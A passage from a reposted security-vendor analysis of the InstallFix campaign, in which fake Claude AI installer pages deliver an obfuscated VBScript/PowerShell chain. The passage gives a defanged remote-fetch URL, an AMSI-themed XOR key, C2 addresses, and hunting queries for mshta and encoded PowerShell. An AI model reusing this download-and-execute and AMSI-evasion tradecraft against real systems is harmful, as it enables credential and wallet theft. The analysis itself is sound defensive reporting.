analysis<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The embedded HTML code was identified inside the ZIP file. 
This suggests that the file may be part of a multi-stage execution chain, where HTML is used as a container or delivery mechanism for additional payloads or scripts.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig18.jpg\" alt=\"Figure 18. The VBScript payload in Claude.msixbundle.zip\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 18. The VBScript payload in Claude.msixbundle.zip<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The ZIP file (Claude.msixbundle.zip) was found to include an embedded, obfuscated VBScript payload delivered through an HTML file. The script appears to be intentionally obfuscated, suggesting malicious intent and likely designed to evade detection or analysis.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig19.png\" alt=\"Figure 19. The hex values under DisplayEmailGNU\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 19. The hex values under DisplayEmailGNU<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Decoding and reconstructing the hex values under the variable <i>DisplayEmailGNU<\/i> using CyberChef reveals that the command is a PowerShell execution command. 
This activity was also observed and captured by Vision One, confirming the execution behavior associated with the payload.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig20.png\" alt=\"Figure 20. Decoded PowerShell command\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 20. Decoded PowerShell command<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The decoded PowerShell command invokes another file to perform additional obfuscation and execution:<\/p>\n<p><b>(https:\/\/$nipple[.]oakenfjrod[.]ru\/cloude-91267b64-989f-49b4-89b4-984e0154d4d1)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>&lt;nipple&gt;<\/b> <span>&#8211; MD5-based machine ID<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>oakenfjrod[.]ru<\/b> <span>&#8211; attacker-controlled domain<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>\/cloude-&#8230;<\/b> <span>&#8211; remote payload path<\/span><\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig21.png\" alt=\"Figure 21. A snippet of the obfuscated command\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 21. A snippet of the obfuscated command<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>During the fourth stage of execution (cloude-91267b64-989f-49b4-89b4-984e0154d4d1), an additional layer of obfuscation was observed. 
This indicates that the payload employs multiple stages of encoding or concealment to hinder analysis and evade detection.<\/p>\n<p>To deobfuscate the bytes, we need the key used in the XOR function, which is stored in <i>$ISLuq0izl8<\/i>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig22.png\" alt=\"Figure 22. A snippet of the obfuscated logic for decoding the obfuscated commands\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 22. A snippet of the obfuscated logic for decoding the obfuscated commands<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig23.png\" alt=\"Figure 23. A snippet of the variable where the decoded result will be stored\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 23. A snippet of the variable where the decoded result will be stored<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>To produce the key, the script concatenates all the characters, and the result is stored in <i>$ISLuq0izl8<\/i>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig24.png\" alt=\"Figure 24. A snippet of the first character to be decoded via XOR function\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 24. 
A snippet of the first character to be decoded via XOR function<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"38\">\n<div readability=\"21\">\n<p>As part of the deobfuscation process, the first character was decoded to derive the key required for further decryption. This step serves as an example of the underlying logic used to reconstruct the full payload from its obfuscated form.<\/p>\n<p><b>Logic to get the XOR KEY<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Combine numbers and remove the variables:<\/span><\/li>\n<\/ul>\n<p>24 + 48 = 72<br \/>39 \u2212 39 = 0<br \/>49 + 38 = 87<\/p>\n<p>72 \u2212 C \u2212 K \u2212 87 + C + K + 80<\/p>\n<p>\u2212C + C = 0<br \/>\u2212K + K = 0<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Remaining:<\/span><\/li>\n<\/ul>\n<p>72 \u2212 87 + 80 = 65 \u2192 <b>&#8220;A&#8221;<\/b><\/p>\n<p><b>From Decimal 65 = A<\/b><\/p>\n<p>Based on this logic, the result of the first character located on $euZ1AMZyMcJWItteQdCD is \u201cA\u201d.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig25.png\" alt=\"Figure 25. A snippet of the decoded XOR key needed to get the shellcode\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 25. A snippet of the decoded XOR key needed to get the shellcode<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>Decoding and resolving all variables that are concatenated into <i>$ISLuq0izl8<\/i> reveals that the XOR key used in the obfuscation process is <i>AMSI_RESULT_NOT_DETECTED &#8211; UTF8<\/i>. 
This indicates the script is leveraging a known AMSI-related string as part of its deobfuscation or evasion technique.<\/p>\n<p>With the XOR key now obtained, we can proceed to deobfuscate the encoded bytes and continue with further analysis of the payload.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig26.png\" alt=\"Figure 26. A snippet of the CyberChef recipe to decode the bytes to get the shellcode payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 26. A snippet of the CyberChef recipe to decode the bytes to get the shellcode payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>Based on the decryption routine, the data is first converted from decimal and Base64 formats, then XOR-decrypted using the key <i>\u201cAMSI_RESULT_NOT_DETECTED\u201d<\/i>. Following this process, the resulting output resolves into shellcode intended for in-memory execution.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig27.png\" alt=\"Figure 27. Shellcode that is designed to be loaded into memory for execution\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 27. Shellcode that is designed to be loaded into memory for execution<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>In addition to other indicators of compromise, scheduled tasks were observed being created on the host system. 
This behavior suggests that the malware is attempting to achieve persistence, allowing it to maintain ongoing connectivity and re-execute automatically, even after system reboots or user logouts.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig28.png\" alt=\"Figure 28. The scheduled task creation was successfully captured by TrendAI Vision One\u2122\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 28. The scheduled task creation was successfully captured by TrendAI Vision One\u2122<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\" readability=\"7\">\n<figure class=\"image-figure\" readability=\"4\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig29.png\" alt=\"Figure 29. The obfuscated command responsible for creating the scheduled task, which is used by the malware to establish persistence on the system\"> <\/p>\n<p><figcaption>Figure 29. The obfuscated command responsible for creating the scheduled task, which is used by the malware to establish persistence on the system<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Upon execution of the shellcode in memory, the system began exhibiting observable changes consistent with in-memory payload activity. The following artifacts, behaviors, and events were identified during runtime analysis:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig30.png\" alt=\"Figure 30. 
Behavior indicating that the malware is attempting to collect data related to e-wallet applications\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 30. Behavior indicating that the malware is attempting to collect data related to e-wallet applications<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig31.png\" alt=\"Figure 31. Behavior indicating that the malware is collecting browser data\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 31. Behavior indicating that the malware is collecting browser data<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"36.5\">\n<div readability=\"18\">\n<p>The outbound connections are 104[.]21[.]0[.]95 and 185[.]177[.]239[.]255. TCP send and TCP receive activity was observed on the infected host. This indicates that the malware is actively establishing network connections and exchanging data with external systems. Such activity suggests potential communication with command-and-control servers, data exfiltration, or coordination with other malicious infrastructure.<\/p>\n<p>Multiple outbound connections were observed during repeated execution of the payload. In this analysis, the payload was executed three times, with each execution generating different outbound network connections.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig32.png\" alt=\"Figure 32. A snippet of the attempt to connect to C&amp;C connection\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 32. 
A snippet of the attempt to connect to C&amp;C connection<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig33.png\" alt=\"Figure 33. The malware attempted to establish a connection to the IP address 77[.]91[.]97[.]244, which resolves to hosted-by[.]yeezyhost[.]net\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 33. The malware attempted to establish a connection to the IP address 77[.]91[.]97[.]244, which resolves to hosted-by[.]yeezyhost[.]net<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig34.png\" alt=\"Figure 34. A snippet of the Wireshark capture showing the unsuccessful connection\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 34. A snippet of the Wireshark capture showing the unsuccessful connection<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>All captured packets consist of TCP SYN requests to 77[.]91[.]97[.]244 over port 443 (HTTPS). The presence of multiple TCP retransmissions indicates that no SYN-ACK responses were received from the destination server, suggesting that the connection attempts were unsuccessful and that the destination IP address was unreachable, possibly because it was offline or non-responsive at the time of analysis.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig35.jpg\" alt=\"Figure 35. An indicator linked to RedLine stealer\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 35. 
An indicator linked to RedLine stealer<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>The InstallFix campaign reveals how cybercriminals are exploiting the popularity of AI tools to launch targeted, high-impact malware attacks. By disguising malicious installers as legitimate Claude AI downloads and using Google Ads as a means of distribution, attackers bypass both user skepticism and their machine\u2019s security controls. By employing techniques such as AMSI bypass, SSL certificate validation disabling, and scheduled task creation for persistence, the malware is able to evade detection and maintain access to infected systems. Organizations must remain vigilant against threats like this by making users aware of installation risks, monitoring for suspicious process and network activity, and prioritizing layered defenses.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>To mitigate the risks posed by campaigns like InstallFix, organizations should adopt proactive security measures and focus on user education. 
The following best practices are designed to help prevent malware infections, detect suspicious activity, and strengthen defenses against deceptive installer threats:<\/p>\n<p><b>Network protection<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Block access to known malicious domains and IP addresses associated with the campaign at your firewall or security gateway.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Use DNS filtering or a secure web gateway to help prevent users from reaching suspicious or newly registered domains.<\/span><\/li>\n<\/ul>\n<p><b>Endpoint security<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Limit or block the use of legacy scripting tools like mshta.exe unless absolutely necessary, as these are commonly abused by attackers.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Ensure your TrendAI endpoint protection solution is configured to automatically block or terminate suspicious behavior, not just alert.<\/span><\/li>\n<\/ul>\n<p><b>User awareness<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Educate users to avoid copying and running installation commands from unfamiliar websites, especially those reached via sponsored search results.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Encourage users to always verify that software download pages match the official vendor\u2019s website before installing anything.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Recommend using trusted package managers (such as npm, pip, brew, or winget) instead of manual installation scripts from third-party sites.<\/span><\/li>\n<\/ul>\n<p><b>Detection and response<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Stay up to date with the latest threat intelligence and apply detection rules or indicators of compromise (IOCs) relevant to ongoing campaigns.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"44.833014659018\">\n<div readability=\"35.472275334608\">\n<p><span 
class=\"body-subhead-title\">Hunting Queries<\/span><\/p>\n<p><b>TrendAI Vision One\u2122 Search App<\/b><\/p>\n<p>TrendAI Vision One\u2122 customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post against data in their environment. Note that the domains in the queries below are defanged with [.]; restore the dots before running them.<\/p>\n<p><b>Full kill-chain correlation<\/b><\/p>\n<p>\/\/ Vision One XDR Search \u2014 pivot from mshta to PS to C2 on one endpoint<br \/>\/\/ Step 1: find hosts where mshta ran with malicious URL args<br \/>eventSubId:TELEMETRY_PROCESS_CREATE<br \/>&nbsp; AND processName:mshta.exe<br \/>&nbsp; AND (processCmd:*1-5-8[.]com* OR processCmd:*msixbundle*<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; OR processCmd:*get-version[.]com*)<\/p>\n<p>\/\/ Step 2: pivot on endpointHostname from above \u2014 find PS child and C2 beacon<br \/>endpointHostName:&lt;HOSTNAME_FROM_STEP1&gt;<br \/>&nbsp; AND (<br \/>&nbsp;&nbsp;&nbsp; (eventSubId:TELEMETRY_PROCESS_CREATE<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; AND processName:powershell.exe<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; AND (processCmd:*-enc* OR processCmd:*IEX*))<br \/>&nbsp;&nbsp;&nbsp; OR<br \/>&nbsp;&nbsp;&nbsp; (eventSubId:TELEMETRY_NETWORK<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; AND request:*oakenfjrod[.]ru*)<br \/>&nbsp; )<\/p>\n<p><b>mshta.exe spawning shell \u2014 Vision One XDR Search<\/b><\/p>\n<p>eventSubId:TELEMETRY_PROCESS_CREATE<br \/>&nbsp; AND parentProcessName:mshta.exe<br \/>&nbsp; AND (processName:cmd.exe OR processName:powershell.exe<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; OR processName:wscript.exe OR processName:cscript.exe)<\/p>\n<p><b>Encoded PowerShell \/ IEX in command line<\/b><\/p>\n<p>eventSubId:TELEMETRY_PROCESS_CREATE<br \/>&nbsp; AND processName:powershell.exe<br \/>&nbsp; AND (processCmd:*-enc* OR processCmd:*-EncodedCommand*<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; OR processCmd:*IEX* OR processCmd:*Invoke-Expression*<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; OR 
processCmd:*AMSI_RESULT_NOT_DETECTED*)<\/p>\n<p>More hunting queries are available for TrendAI Vision One\u2122 with&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/threat-intelligence.html\" target=\"_blank\">Threat Intelligence Hub<\/a>&nbsp;entitlement enabled.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"29.708333333333\">\n<div readability=\"6.7083333333333\">\n<p>The indicators of compromise for this entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/IOCS_InstallFix.txt\" target=\"_blank\">here<\/a>.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/26\/e\/installfix-and-claude-code.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Targeting multiple industries worldwide, the InstallFix campaign uses fake Claude AI installer pages to trick users into running malware that collects system information, disables security features, achieves persistence, and connects to attacker-controlled C&#038;C servers for additional payloads. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9511,9509],"class_list":["post-60590","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-05T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"17 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"InstallFix and Claude Code: How Fake Install Pages Lead to Real 
Compromise\",\"datePublished\":\"2026-05-05T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/\"},\"wordCount\":3413,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/installfix_thunbnail:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/\",\"name\":\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/installfix_thunbnail:Large?qlt=80\",\"datePublished\":\"2026-05-05T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/installfix_thunbnail:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/installfix_thunbnail:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox 
\u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH 
